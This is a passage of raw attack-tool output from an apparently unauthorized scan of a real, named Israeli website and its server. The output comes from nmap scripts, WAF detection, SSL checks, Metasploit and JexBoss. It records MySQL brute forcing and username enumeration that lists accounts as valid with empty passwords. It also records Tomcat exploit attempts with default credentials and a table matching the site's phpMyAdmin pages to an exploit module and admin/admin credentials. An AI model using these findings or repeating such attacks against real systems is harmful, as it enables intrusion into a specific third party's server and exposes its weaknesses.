  2434. | mysql-brute:
  2435. | Accounts: No valid accounts found
  2436. |_ Statistics: Performed 15932 guesses in 600 seconds, average tps: 26.6
  2437. | mysql-enum:
  2438. | Valid usernames:
  2439. | root:<empty> - Valid credentials
  2440. | netadmin:<empty> - Valid credentials
  2441. | guest:<empty> - Valid credentials
  2442. | user:<empty> - Valid credentials
  2443. | web:<empty> - Valid credentials
  2444. | sysadmin:<empty> - Valid credentials
  2445. | administrator:<empty> - Valid credentials
  2446. | webadmin:<empty> - Valid credentials
  2447. | admin:<empty> - Valid credentials
  2448. | test:<empty> - Valid credentials
  2449. |_ Statistics: Performed 10 guesses in 1 seconds, average tps: 10.0
  2450. | mysql-info:
  2451. | Protocol: 10
  2452. | Version: 5.5.60-MariaDB
  2453. | Thread ID: 11651486
  2454. | Capabilities flags: 63487
  2455. | Some Capabilities: ConnectWithDatabase, Support41Auth, Speaks41ProtocolOld, DontAllowDatabaseTableColumn, LongPassword, Speaks41ProtocolNew, InteractiveClient, FoundRows, SupportsLoadDataLocal, IgnoreSigpipes, SupportsTransactions, LongColumnFlag, IgnoreSpaceBeforeParenthesis, ODBCClient, SupportsCompression, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults
  2456. | Status: Autocommit
  2457. | Salt: >4+yC!y_OQ&jd5|3&eI!
  2458. |_ Auth Plugin Name: mysql_native_password
  2459. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  2460. Device type: general purpose|firewall|storage-misc|VoIP phone
  2461. Running (JUST GUESSING): Linux 2.6.X|3.X (91%), WatchGuard Fireware 11.X (91%), Synology DiskStation Manager 5.X (90%), Grandstream embedded (85%)
  2462. OS CPE: cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3.10 cpe:/o:watchguard:fireware:11.8 cpe:/o:linux:linux_kernel cpe:/a:synology:diskstation_manager:5.1 cpe:/h:grandstream:gxv3275
  2463. Aggressive OS guesses: Linux 2.6.32 (91%), Linux 2.6.39 (91%), Linux 3.10 (91%), Linux 3.4 (91%), WatchGuard Fireware 11.8 (91%), Linux 3.1 - 3.2 (91%), Synology DiskStation Manager 5.1 (90%), Linux 2.6.32 or 3.10 (89%), Linux 2.6.32 - 2.6.39 (87%), Linux 2.6.18 - 2.6.22 (86%)
  2464. No exact OS matches for host (test conditions non-ideal).
  2465. Network Distance: 16 hops
  2466.  
  2467. TRACEROUTE (using port 3306/tcp)
  2468. HOP RTT ADDRESS
  2469. 1 143.63 ms 10.246.200.1
  2470. 2 143.68 ms vlan113.as01.sof1.bg.m247.com (193.9.115.113)
  2471. 3 143.68 ms vlan299.bb1.sof1.bg.m247.com (176.10.83.34)
  2472. 4 143.70 ms sfia-b2-link.telia.net (62.115.148.144)
  2473. 5 176.88 ms 80.91.253.248
  2474. 6 176.92 ms 62.115.133.79
  2475. 7 181.16 ms ffm-b1-link.telia.net (62.115.137.165)
  2476. 8 176.96 ms netvision-ic-309800-ffm-b11.c.telia.net (80.239.196.190)
  2477. 9 ...
  2478. 10 228.80 ms gw2-hfa-po10-gw1.nta.nv.net.il (212.143.12.32)
  2479. 11 232.65 ms 212.143.7.35
  2480. 12 234.84 ms core2-rha-2-0-0-core2-hfa-5-0-7.nv.net.il (212.143.12.119)
  2481. 13 237.60 ms 212.143.201.205
  2482. 14 238.94 ms po221.srvc3.rha.nv.net.il (212.143.201.188)
  2483. 15 233.80 ms 62-90-134-178.barak.net.il (62.90.134.178)
  2484. 16 233.22 ms server.webid.co.il (62.90.134.182)
  2485. #######################################################################################################################################
  2486. + -- --=[Port 8000 closed... skipping.
  2487. + -- --=[Port 8100 closed... skipping.
  2488. + -- --=[Port 8080 opened... running tests...
  2489.  
  2490. ^ ^
  2491. _ __ _ ____ _ __ _ _ ____
  2492. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
  2493. | V V // o // _/ | V V // 0 // 0 // _/
  2494. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
  2495. <
  2496. ...'
  2497.  
  2498. WAFW00F - Web Application Firewall Detection Tool
  2499.  
  2500. By Sandro Gauci && Wendel G. Henrique
  2501.  
  2502. Checking http://babylon-woodline.co.il:8080
  2503. The site http://babylon-woodline.co.il:8080 is behind a Imperva SecureSphere
  2504. Number of requests: 9
  2505.  
  2506. http://babylon-woodline.co.il:8080 [301 Moved Permanently] Apache[2], Country[ISRAEL][IL], HTTPServer[Apache/2], IP[62.90.134.182], RedirectLocation[/index.1.html]
  2507. http://babylon-woodline.co.il:8080/index.1.html [200 OK] Apache[2], Country[ISRAEL][IL], HTML5, HTTPServer[Apache/2], IP[62.90.134.182], JQuery, Meta-Author[ישראל ממליץ], Open-Graph-Protocol, Script[text/javascript], Title[מזרונים ליין]
  2508.  
  2509. Version: 1.11.12-static
  2510. OpenSSL 1.0.2-chacha (1.0.2g-dev)
  2511.  
  2512. Connected to 62.90.134.182
  2513.  
  2514. Testing SSL server babylon-woodline.co.il on port 8080 using SNI name babylon-woodline.co.il
  2515.  
  2516. TLS Fallback SCSV:
  2517. Server does not support TLS Fallback SCSV
  2518.  
  2519. TLS renegotiation:
  2520. Session renegotiation not supported
  2521.  
  2522. TLS Compression:
  2523. Compression disabled
  2524.  
  2525. Heartbleed:
  2526. TLS 1.2 not vulnerable to heartbleed
  2527. TLS 1.1 not vulnerable to heartbleed
  2528. TLS 1.0 not vulnerable to heartbleed
  2529.  
  2530. Supported Server Cipher(s):
  2531. #######################################################################################################################################
  2532. Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-01-23 04:59 EST
  2533. Nmap scan report for babylon-woodline.co.il (62.90.134.182)
  2534. Host is up (0.23s latency).
  2535. rDNS record for 62.90.134.182: server.webid.co.il
  2536.  
  2537. PORT STATE SERVICE VERSION
  2538. 8080/tcp open ssl/http-proxy Apache/2
  2539. |_http-server-header: Apache/2
  2540. |_http-vuln-cve2017-5638: ERROR: Script execution failed (use -d to debug)
  2541. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  2542. Device type: general purpose|firewall|storage-misc|VoIP phone
  2543. Running (JUST GUESSING): Linux 2.6.X|3.X (91%), WatchGuard Fireware 11.X (91%), Synology DiskStation Manager 5.X (90%), Grandstream embedded (85%)
  2544. OS CPE: cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3.10 cpe:/o:watchguard:fireware:11.8 cpe:/o:linux:linux_kernel cpe:/a:synology:diskstation_manager:5.1 cpe:/h:grandstream:gxv3275
  2545. Aggressive OS guesses: Linux 2.6.32 (91%), Linux 2.6.32 or 3.10 (91%), Linux 3.10 (91%), Linux 3.4 (91%), WatchGuard Fireware 11.8 (91%), Linux 3.1 - 3.2 (91%), Synology DiskStation Manager 5.1 (90%), Linux 2.6.39 (89%), Linux 2.6.32 - 2.6.39 (87%), Linux 2.6.18 - 2.6.22 (86%)
  2546. No exact OS matches for host (test conditions non-ideal).
  2547. Network Distance: 17 hops
  2548.  
  2549. TRACEROUTE (using port 8080/tcp)
  2550. HOP RTT ADDRESS
  2551. 1 146.37 ms 10.246.200.1
  2552. 2 146.77 ms vlan113.as01.sof1.bg.m247.com (193.9.115.113)
  2553. 3 146.42 ms vlan299.bb1.sof1.bg.m247.com (176.10.83.34)
  2554. 4 146.42 ms sfia-b2-link.telia.net (62.115.148.144)
  2555. 5 179.82 ms prag-bb1-link.telia.net (62.115.119.70)
  2556. 6 179.21 ms ffm-bb4-link.telia.net (62.115.133.79)
  2557. 7 179.86 ms ffm-b1-link.telia.net (62.115.121.1)
  2558. 8 179.26 ms 80.239.196.190
  2559. 9 ...
  2560. 10 233.90 ms gw2-hfa-0-2-0-2-200-gw2.fra.nv.net.il (212.143.12.13)
  2561. 11 233.26 ms 212.143.12.32
  2562. 12 234.29 ms 212.143.7.28
  2563. 13 233.81 ms po221.srvc3.rha.nv.net.il (212.143.201.188)
  2564. 14 234.25 ms 82.166.37.254
  2565. 15 232.54 ms 82.166.37.254
  2566. 16 233.45 ms 62-90-134-178.barak.net.il (62.90.134.178)
  2567. 17 234.31 ms server.webid.co.il (62.90.134.182)
  2568. #######################################################################################################################################
  2569. RHOSTS => babylon-woodline.co.il
  2570. RHOST => babylon-woodline.co.il
  2571. [-] WAR file not found
  2572. [*] Auxiliary module execution completed
  2573. [*] Scanned 1 of 1 hosts (100% complete)
  2574. [*] Auxiliary module execution completed
  2575. RPORT => 8080
  2576. [*] Scanned 1 of 1 hosts (100% complete)
  2577. [*] Auxiliary module execution completed
  2578. [*] Attempting to connect to 62.90.134.182:8080
  2579. [+] No File(s) found
  2580. [*] Scanned 1 of 1 hosts (100% complete)
  2581. [*] Auxiliary module execution completed
  2582. [*] http://62.90.134.182:8080/admin/j_security_check - Checking j_security_check...
  2583. [*] http://62.90.134.182:8080/admin/j_security_check - Server returned: 404
  2584. [-] http://62.90.134.182:8080/admin/j_security_check - Unable to enumerate users with this URI
  2585. [*] Scanned 1 of 1 hosts (100% complete)
  2586. [*] Auxiliary module execution completed
  2587. [-] http://62.90.134.182:8080 - Authorization not requested
  2588. [*] Scanned 1 of 1 hosts (100% complete)
  2589. [*] Auxiliary module execution completed
  2590. [-] Exploit aborted due to failure: not-found: The target server fingerprint "Apache/2" does not match "(?-mix:Apache.*(Coyote|Tomcat))", use 'set FingerprintCheck false' to disable this check.
  2591. [*] Exploit completed, but no session was created.
  2592. USERNAME => tomcat
  2593. PASSWORD => tomcat
  2594. [-] Exploit aborted due to failure: not-found: The target server fingerprint "Apache/2" does not match "(?-mix:Apache.*(Coyote|Tomcat))", use 'set FingerprintCheck false' to disable this check.
  2595. [*] Exploit completed, but no session was created.
  2596. #######################################################################################################################################
  2597.  
  2598. * --- JexBoss: Jboss verify and EXploitation Tool --- *
  2599. | * And others Java Deserialization Vulnerabilities * |
  2600. | |
  2601. | @author: João Filho Matos Figueiredo |
  2602. | @contact: joaomatosf@gmail.com |
  2603. | |
  2604. | @update: https://github.com/joaomatosf/jexboss |
  2605. #______________________________________________________#
  2606.  
  2607. @version: 1.2.4
  2608.  
  2609. * Checking for updates in: http://joaomatosf.com/rnp/releases.txt **
  2610.  
  2611.  
  2612. ** Checking Host: http://babylon-woodline.co.il:8080 **
  2613.  
  2614. [*] Checking admin-console: [ OK ]
  2615. [*] Checking Struts2: [ OK ]
  2616. [*] Checking Servlet Deserialization: [ OK ]
  2617. [*] Checking Application Deserialization: [ OK ]
  2618. [*] Checking Jenkins: [ OK ]
  2619. [*] Checking web-console: [ OK ]
  2620. [*] Checking jmx-console: [ REDIRECT ]
  2621. * The server sent a redirect to: /HtmlAdaptor/index.1.html
  2622.  
  2623. [*] Checking JMXInvokerServlet: [ OK ]
  2624.  
  2625.  
  2626. * Results:
  2627. The server is not vulnerable to bugs tested ... :D
  2628.  
  2629. * Info: review, suggestions, updates, etc:
  2630. https://github.com/joaomatosf/jexboss
  2631.  
  2632. * DONATE: Please consider making a donation to help improve this tool,
  2633. * Bitcoin Address: 14x4niEpfp7CegBYr3tTzTn4h6DAnDCD9C
  2634. ######################################################################################################################################
  2635. +------------+----------------------------------------+--------------------------------------------------+-----------+-----------+
  2636. | App Name | URL to Application | Potential Exploit | Username | Password |
  2637. +------------+----------------------------------------+--------------------------------------------------+-----------+-----------+
  2638. | phpMyAdmin | https://62.90.134.182:443/phpmyadmin/ | ./exploits/multi/http/phpmyadmin_preg_replace.rb | admin | admin |
  2639. | phpMyAdmin | https://62.90.134.182:8081/phpmyadmin/ | ./exploits/multi/http/phpmyadmin_preg_replace.rb | Not Found | Not Found |
  2640. +------------+----------------------------------------+--------------------------------------------------+-----------+-----------+
  2641. #######################################################################################################################################
  2642. Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-01-23 05:09 EST
  2643. NSE: Loaded 149 scripts for scanning.
  2644. NSE: Script Pre-scanning.
  2645. NSE: Starting runlevel 1 (of 3) scan.
  2646. Initiating NSE at 05:09
  2647. Completed NSE at 05:09, 0.00s elapsed
  2648. NSE: Starting runlevel 2 (of 3) scan.
  2649. Initiating NSE at 05:09
  2650. Completed NSE at 05:09, 0.00s elapsed
  2651. NSE: Starting runlevel 3 (of 3) scan.
  2652. Initiating NSE at 05:09
  2653. Completed NSE at 05:09, 0.00s elapsed
  2654. Initiating Ping Scan at 05:09
  2655. Scanning babylon-woodline.co.il (62.90.134.182) [4 ports]
  2656. Completed Ping Scan at 05:09, 0.27s elapsed (1 total hosts)
  2657. Initiating Parallel DNS resolution of 1 host. at 05:09
  2658. Completed Parallel DNS resolution of 1 host. at 05:09, 0.02s elapsed
  2659. Initiating Connect Scan at 05:09
  2660. Scanning babylon-woodline.co.il (62.90.134.182) [1000 ports]
  2661. Discovered open port 587/tcp on 62.90.134.182
  2662. Discovered open port 8080/tcp on 62.90.134.182
  2663. Discovered open port 995/tcp on 62.90.134.182
  2664. Discovered open port 143/tcp on 62.90.134.182
  2665. Discovered open port 21/tcp on 62.90.134.182
  2666. Discovered open port 3306/tcp on 62.90.134.182
  2667. Discovered open port 110/tcp on 62.90.134.182
  2668. Discovered open port 80/tcp on 62.90.134.182
  2669. Discovered open port 53/tcp on 62.90.134.182
  2670. Discovered open port 993/tcp on 62.90.134.182
  2671. Discovered open port 443/tcp on 62.90.134.182
  2672. Discovered open port 5060/tcp on 62.90.134.182
  2673. Discovered open port 2222/tcp on 62.90.134.182
  2674. Discovered open port 8081/tcp on 62.90.134.182
  2675. Discovered open port 2000/tcp on 62.90.134.182
  2676. Discovered open port 465/tcp on 62.90.134.182
  2677. Completed Connect Scan at 05:09, 9.19s elapsed (1000 total ports)
  2678. Initiating Service scan at 05:09
  2679. Scanning 16 services on babylon-woodline.co.il (62.90.134.182)
  2680. Completed Service scan at 05:09, 19.21s elapsed (16 services on 1 host)
  2681. Initiating OS detection (try #1) against babylon-woodline.co.il (62.90.134.182)
  2682. Retrying OS detection (try #2) against babylon-woodline.co.il (62.90.134.182)
  2683. Initiating Traceroute at 05:09
  2684. Completed Traceroute at 05:09, 3.03s elapsed
  2685. Initiating Parallel DNS resolution of 15 hosts. at 05:09
  2686. Completed Parallel DNS resolution of 15 hosts. at 05:10, 16.51s elapsed
  2687. NSE: Script scanning 62.90.134.182.
  2688. NSE: Starting runlevel 1 (of 3) scan.
  2689. Initiating NSE at 05:10
  2690. Completed NSE at 05:10, 22.76s elapsed
  2691. NSE: Starting runlevel 2 (of 3) scan.
  2692. Initiating NSE at 05:10
  2693. NSE Timing: About 90.62% done; ETC: 05:11 (0:00:03 remaining)
  2694. NSE Timing: About 92.19% done; ETC: 05:11 (0:00:05 remaining)
  2695. NSE Timing: About 93.75% done; ETC: 05:12 (0:00:06 remaining)
  2696. NSE Timing: About 94.53% done; ETC: 05:12 (0:00:07 remaining)
  2697. NSE Timing: About 95.31% done; ETC: 05:13 (0:00:07 remaining)
  2698. NSE Timing: About 97.66% done; ETC: 05:13 (0:00:04 remaining)
  2699. Completed NSE at 05:13, 207.01s elapsed
  2700. NSE: Starting runlevel 3 (of 3) scan.
  2701. Initiating NSE at 05:13
  2702. Completed NSE at 05:13, 0.00s elapsed
  2703. Nmap scan report for babylon-woodline.co.il (62.90.134.182)
  2704. Host is up, received syn-ack ttl 50 (0.18s latency).
  2705. rDNS record for 62.90.134.182: server.webid.co.il
  2706. Scanned at 2019-01-23 05:09:11 EST for 285s
  2707. Not shown: 797 closed ports, 187 filtered ports
  2708. Reason: 797 conn-refused and 187 no-responses
  2709. PORT STATE SERVICE REASON VERSION
  2710. 21/tcp open ftp syn-ack ProFTPD
  2711. |_ssl-date: TLS randomness does not represent time
  2712. | tls-alpn:
  2713. |_ ftp
  2714. | tls-nextprotoneg:
  2715. |_ ftp
  2716. 53/tcp open domain syn-ack ISC BIND 9.9.4 (RedHat Enterprise Linux 7)
  2717. | dns-nsid:
  2718. |_ bind.version: 9.9.4-RedHat-9.9.4-61.el7
  2719. 80/tcp open http syn-ack nginx
  2720. |_http-favicon: Unknown favicon MD5: FFF38020C5ABFF9E0F6B3AFCD2E35E75
  2721. | http-methods:
  2722. |_ Supported Methods: GET HEAD POST
  2723. |_http-server-header: nginx
  2724. | http-title: \xD7\x9E\xD7\x96\xD7\xA8\xD7\x95\xD7\xA0\xD7\x99\xD7\x9D \xD7\x9C\xD7\x99\xD7\x99\xD7\x9F
  2725. |_Requested resource was /index.1.html
  2726. 110/tcp open pop3 syn-ack Dovecot DirectAdmin pop3d
  2727. |_pop3-capabilities: PIPELINING TOP SASL(PLAIN) UIDL AUTH-RESP-CODE CAPA USER RESP-CODES STLS
  2728. |_ssl-date: TLS randomness does not represent time
  2729. 143/tcp open imap syn-ack Dovecot imapd
  2730. |_imap-capabilities: ID LITERAL+ more have post-login capabilities IMAP4rev1 LOGIN-REFERRALS listed IDLE AUTH=PLAINA0001 STARTTLS Pre-login ENABLE SASL-IR OK
  2731. |_ssl-date: TLS randomness does not represent time
  2732. 443/tcp open ssl/http syn-ack nginx
  2733. | http-methods:
  2734. |_ Supported Methods: GET HEAD POST
  2735. |_http-server-header: nginx
  2736. |_http-title: Secured Home of babylon-woodline.co.il
  2737. | ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=US/emailAddress=webmaster@localhost/organizationalUnitName=none/localityName=Sometown
  2738. | Issuer: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=US/emailAddress=webmaster@localhost/organizationalUnitName=none/localityName=Sometown
  2739. | Public Key type: rsa
  2740. | Public Key bits: 2048
  2741. | Signature Algorithm: sha1WithRSAEncryption
  2742. | Not valid before: 2014-09-20T10:18:07
  2743. | Not valid after: 2042-02-04T10:18:07
  2744. | MD5: 97da b648 4f2a ad48 4f97 84fd 6789 b7bb
  2745. | SHA-1: 2e3f 643e 5d11 a459 bd85 ab36 e5e5 593f 04c8 e51f
  2746. | -----BEGIN CERTIFICATE-----
  2747. | MIIDmDCCAoACCQCZ91j/rN7tyzANBgkqhkiG9w0BAQUFADCBjTELMAkGA1UEBhMC
  2748. | VVMxFTATBgNVBAgTDFNvbWVwcm92aW5jZTERMA8GA1UEBxMIU29tZXRvd24xDTAL
  2749. | BgNVBAoTBG5vbmUxDTALBgNVBAsTBG5vbmUxEjAQBgNVBAMTCWxvY2FsaG9zdDEi
  2750. | MCAGCSqGSIb3DQEJARYTd2VibWFzdGVyQGxvY2FsaG9zdDAeFw0xNDA5MjAxMDE4
  2751. | MDdaFw00MjAyMDQxMDE4MDdaMIGNMQswCQYDVQQGEwJVUzEVMBMGA1UECBMMU29t
  2752. | ZXByb3ZpbmNlMREwDwYDVQQHEwhTb21ldG93bjENMAsGA1UEChMEbm9uZTENMAsG
  2753. | A1UECxMEbm9uZTESMBAGA1UEAxMJbG9jYWxob3N0MSIwIAYJKoZIhvcNAQkBFhN3
  2754. | ZWJtYXN0ZXJAbG9jYWxob3N0MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKC
  2755. | AQEAr/uRtz74Kc4qIEnSgfQQgY+r3EyOCRPcIoTGbcukLIwe9sP2PdMIYeonuEh4
  2756. | bshnBLjjtk6CzcOK9s1Vb1CW4Vmtb5eI1TNcsokAUVV5llTZEfIuY2UtroV8W2LI
  2757. | WZ6VxbwEzd+UeeGrHiMUc9O94sxU/fDo5ttAdElgfIEp+uR5qDG2VzpE5F7Lc61L
  2758. | CF7xFUrxRMgCYYCYmr7Zs/FNY2nU920i7hRco6bgRQeQvAC+KFKsHuUzyq08g3Q6
  2759. | 0V6DCBmAaq5Ku4QzQBGSFRXb/6jYYhGYxO4f6VsxLrBA7LL0kwUL+YCjXCz1iK3R
  2760. | 6kiVRcyJqtWahOHDq3YKaLtr1wIDAQABMA0GCSqGSIb3DQEBBQUAA4IBAQA+4fjC
  2761. | b19T78ZHZNXZodf7Tpl8PMY6ljd6nU9dokYwvnFgR9anGpTfXipcGDSorEdFMBqH
  2762. | 5cPN/yu6SNRQaLnYwqII9we2HDMFAnYlvCb1vNSSp2k+KIf6nEEvE2B0zfL7+dHJ
  2763. | 0rJyggNXT0VTs7ZI9PM/RlPH75khNHD7U3Vz4NSBVm7oTVg8VZhExKhS2JTy2zii
  2764. | WjGPVzBbMzGioZhHE/b96M70o+89fxkE+g3oNJLAZJfao2qy5oiLAt1spCPQ40HW
  2765. | hPzHGuGIMABG+263nikmVG0m0A3JTYQLfgBqxiBkauP6kT3KszTGXWUduj/9YHRW
  2766. | Mkh66D1gfgB2ubts
  2767. |_-----END CERTIFICATE-----
  2768. |_ssl-date: TLS randomness does not represent time
  2769. | tls-alpn:
  2770. | h2
  2771. |_ http/1.1
  2772. | tls-nextprotoneg:
  2773. | h2
  2774. |_ http/1.1
  2775. 465/tcp open ssl/smtp syn-ack Exim smtpd 4.91
  2776. |_smtp-commands: SMTP EHLO babylon-woodline.co.il: failed to receive data: failed to receive data
  2777. | ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB/emailAddress=webaster@localhost/organizationalUnitName=none/localityName=Sometown
  2778. | Issuer: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB/emailAddress=webaster@localhost/organizationalUnitName=none/localityName=Sometown
  2779. | Public Key type: rsa
  2780. | Public Key bits: 1024
  2781. | Signature Algorithm: sha1WithRSAEncryption
  2782. | Not valid before: 2014-07-29T06:26:14
  2783. | Not valid after: 2041-12-13T06:26:14
  2784. | MD5: 4b29 2c8a 525a d420 e4f7 78c1 45d2 4ed9
  2785. | SHA-1: cc0a 349f 83d9 4d41 d316 0e7a a751 ce8d 5322 7241
  2786. | -----BEGIN CERTIFICATE-----
  2787. | MIICkTCCAfoCCQD3JF1s3Ui7BzANBgkqhkiG9w0BAQUFADCBjDELMAkGA1UEBhMC
  2788. | R0IxFTATBgNVBAgTDFNvbWVwcm92aW5jZTERMA8GA1UEBxMIU29tZXRvd24xDTAL
  2789. | BgNVBAoTBG5vbmUxDTALBgNVBAsTBG5vbmUxEjAQBgNVBAMTCWxvY2FsaG9zdDEh
  2790. | MB8GCSqGSIb3DQEJARYSd2ViYXN0ZXJAbG9jYWxob3N0MB4XDTE0MDcyOTA2MjYx
  2791. | NFoXDTQxMTIxMzA2MjYxNFowgYwxCzAJBgNVBAYTAkdCMRUwEwYDVQQIEwxTb21l
  2792. | cHJvdmluY2UxETAPBgNVBAcTCFNvbWV0b3duMQ0wCwYDVQQKEwRub25lMQ0wCwYD
  2793. | VQQLEwRub25lMRIwEAYDVQQDEwlsb2NhbGhvc3QxITAfBgkqhkiG9w0BCQEWEndl
  2794. | YmFzdGVyQGxvY2FsaG9zdDCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEA5Euc
  2795. | SYOuqLn4h5hktsteODz8pR6VsFNktHT+tgSHoEPeJ/2S1efAY/zoMRhwXo9k9RVc
  2796. | S11EDYVjzGrQeni2/o0rFC3kCJI37P4AHbaQg7BJlyqVW9BHQaHW++gknGH8L2XF
  2797. | DC97iiawhWQIEF06Hg8319FHZZBdTEi3w5A0R10CAwEAATANBgkqhkiG9w0BAQUF
  2798. | AAOBgQBT5tKhGxu0mGTfi9dP8q21FSzhyR9G5n7uGL/+3Bl7Six7w9l+4HOy3zMl
  2799. | VvJTXWh+FGInAytzBf4BzC3D84qo13B8w13tivpdNf1o1WV65fgBZZTmak/KCbZf
  2800. | 9BHpO92XZPxlmPCEPoMmyXN0dVM8jZmbI6LvFZZS1EBIPx9fng==
  2801. |_-----END CERTIFICATE-----
  2802. |_ssl-date: TLS randomness does not represent time
  2803. 587/tcp open smtp syn-ack Exim smtpd 4.91
  2804. |_smtp-commands: SMTP: EHLO 550 Bad HELO - Host impersonating domain name [babylon-woodline.co.il]\x0D
  2805. 993/tcp open ssl/imaps? syn-ack
  2806. |_ssl-date: TLS randomness does not represent time
  2807. 995/tcp open ssl/pop3s? syn-ack
  2808. |_ssl-date: TLS randomness does not represent time
  2809. 2000/tcp open tcpwrapped syn-ack
  2810. 2222/tcp open http syn-ack DirectAdmin httpd 1.53.0 (Registered to webid.co.il)
  2811. |_http-favicon: Unknown favicon MD5: F0CC6DDDAE553AA7CFEB2CA5B62B2083
  2812. | http-methods:
  2813. |_ Supported Methods: GET HEAD POST
  2814. |_http-title: Site doesn't have a title (text/html).
  2815. |_http-trane-info: Problem with XML parsing of /evox/about
  2816. 3306/tcp open mysql syn-ack MySQL 5.5.60-MariaDB
  2817. | mysql-info:
  2818. | Protocol: 10
  2819. | Version: 5.5.60-MariaDB
  2820. | Thread ID: 11696681
  2821. | Capabilities flags: 63487
  2822. | Some Capabilities: ODBCClient, Speaks41ProtocolOld, SupportsLoadDataLocal, DontAllowDatabaseTableColumn, SupportsTransactions, Support41Auth, SupportsCompression, FoundRows, Speaks41ProtocolNew, InteractiveClient, IgnoreSigpipes, LongPassword, IgnoreSpaceBeforeParenthesis, ConnectWithDatabase, LongColumnFlag, SupportsMultipleResults, SupportsAuthPlugins, SupportsMultipleStatments
  2823. | Status: Autocommit
  2824. | Salt: -y>fhYbaBeV`_=P\^DuB
  2825. |_ Auth Plugin Name: mysql_native_password
  2826. 5060/tcp open tcpwrapped syn-ack
  2827. 8080/tcp open ssl/http-proxy syn-ack Apache/2
  2828. | http-methods:
  2829. |_ Supported Methods: GET HEAD POST OPTIONS
  2830. |_http-open-proxy: Proxy might be redirecting requests
  2831. |_http-server-header: Apache/2
  2832. | http-title: \xD7\x9E\xD7\x96\xD7\xA8\xD7\x95\xD7\xA0\xD7\x99\xD7\x9D \xD7\x9C\xD7\x99\xD7\x99\xD7\x9F
  2833. |_Requested resource was /index.1.html
  2834. 8081/tcp open ssl/ssl syn-ack Apache httpd (SSL-only mode)
  2835. | ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=US/emailAddress=webmaster@localhost/organizationalUnitName=none/localityName=Sometown
  2836. | Issuer: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=US/emailAddress=webmaster@localhost/organizationalUnitName=none/localityName=Sometown
  2837. | Public Key type: rsa
  2838. | Public Key bits: 2048
  2839. | Signature Algorithm: sha1WithRSAEncryption
  2840. | Not valid before: 2014-09-20T10:18:07
  2841. | Not valid after: 2042-02-04T10:18:07
  2842. | MD5: 97da b648 4f2a ad48 4f97 84fd 6789 b7bb
  2843. | SHA-1: 2e3f 643e 5d11 a459 bd85 ab36 e5e5 593f 04c8 e51f
  2844. | -----BEGIN CERTIFICATE-----
  2845. | MIIDmDCCAoACCQCZ91j/rN7tyzANBgkqhkiG9w0BAQUFADCBjTELMAkGA1UEBhMC
  2846. | VVMxFTATBgNVBAgTDFNvbWVwcm92aW5jZTERMA8GA1UEBxMIU29tZXRvd24xDTAL
  2847. | BgNVBAoTBG5vbmUxDTALBgNVBAsTBG5vbmUxEjAQBgNVBAMTCWxvY2FsaG9zdDEi
  2848. | MCAGCSqGSIb3DQEJARYTd2VibWFzdGVyQGxvY2FsaG9zdDAeFw0xNDA5MjAxMDE4
  2849. | MDdaFw00MjAyMDQxMDE4MDdaMIGNMQswCQYDVQQGEwJVUzEVMBMGA1UECBMMU29t
  2850. | ZXByb3ZpbmNlMREwDwYDVQQHEwhTb21ldG93bjENMAsGA1UEChMEbm9uZTENMAsG
  2851. | A1UECxMEbm9uZTESMBAGA1UEAxMJbG9jYWxob3N0MSIwIAYJKoZIhvcNAQkBFhN3
  2852. | ZWJtYXN0ZXJAbG9jYWxob3N0MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKC
  2853. | AQEAr/uRtz74Kc4qIEnSgfQQgY+r3EyOCRPcIoTGbcukLIwe9sP2PdMIYeonuEh4
  2854. | bshnBLjjtk6CzcOK9s1Vb1CW4Vmtb5eI1TNcsokAUVV5llTZEfIuY2UtroV8W2LI
  2855. | WZ6VxbwEzd+UeeGrHiMUc9O94sxU/fDo5ttAdElgfIEp+uR5qDG2VzpE5F7Lc61L
  2856. | CF7xFUrxRMgCYYCYmr7Zs/FNY2nU920i7hRco6bgRQeQvAC+KFKsHuUzyq08g3Q6
  2857. | 0V6DCBmAaq5Ku4QzQBGSFRXb/6jYYhGYxO4f6VsxLrBA7LL0kwUL+YCjXCz1iK3R
  2858. | 6kiVRcyJqtWahOHDq3YKaLtr1wIDAQABMA0GCSqGSIb3DQEBBQUAA4IBAQA+4fjC
  2859. | b19T78ZHZNXZodf7Tpl8PMY6ljd6nU9dokYwvnFgR9anGpTfXipcGDSorEdFMBqH
  2860. | 5cPN/yu6SNRQaLnYwqII9we2HDMFAnYlvCb1vNSSp2k+KIf6nEEvE2B0zfL7+dHJ
  2861. | 0rJyggNXT0VTs7ZI9PM/RlPH75khNHD7U3Vz4NSBVm7oTVg8VZhExKhS2JTy2zii
  2862. | WjGPVzBbMzGioZhHE/b96M70o+89fxkE+g3oNJLAZJfao2qy5oiLAt1spCPQ40HW
  2863. | hPzHGuGIMABG+263nikmVG0m0A3JTYQLfgBqxiBkauP6kT3KszTGXWUduj/9YHRW
  2864. | Mkh66D1gfgB2ubts
  2865. |_-----END CERTIFICATE-----
  2866. |_ssl-date: TLS randomness does not represent time
  2867. | tls-alpn:
  2868. |_ http/1.1
  2869. OS fingerprint not ideal because: Didn't receive UDP response. Please try again with -sSU
  2870. Aggressive OS guesses: Linux 2.6.32 (93%), Linux 2.6.32 or 3.10 (93%), WatchGuard Fireware 11.8 (93%), Synology DiskStation Manager 5.1 (92%), Linux 2.6.39 (92%), Linux 3.4 (92%), Linux 3.1 - 3.2 (92%), Linux 3.10 (91%), Linux 2.6.32 - 2.6.39 (90%), Linux 2.6.32 - 3.0 (89%)
  2871. No exact OS matches for host (test conditions non-ideal).
  2872. TCP/IP fingerprint:
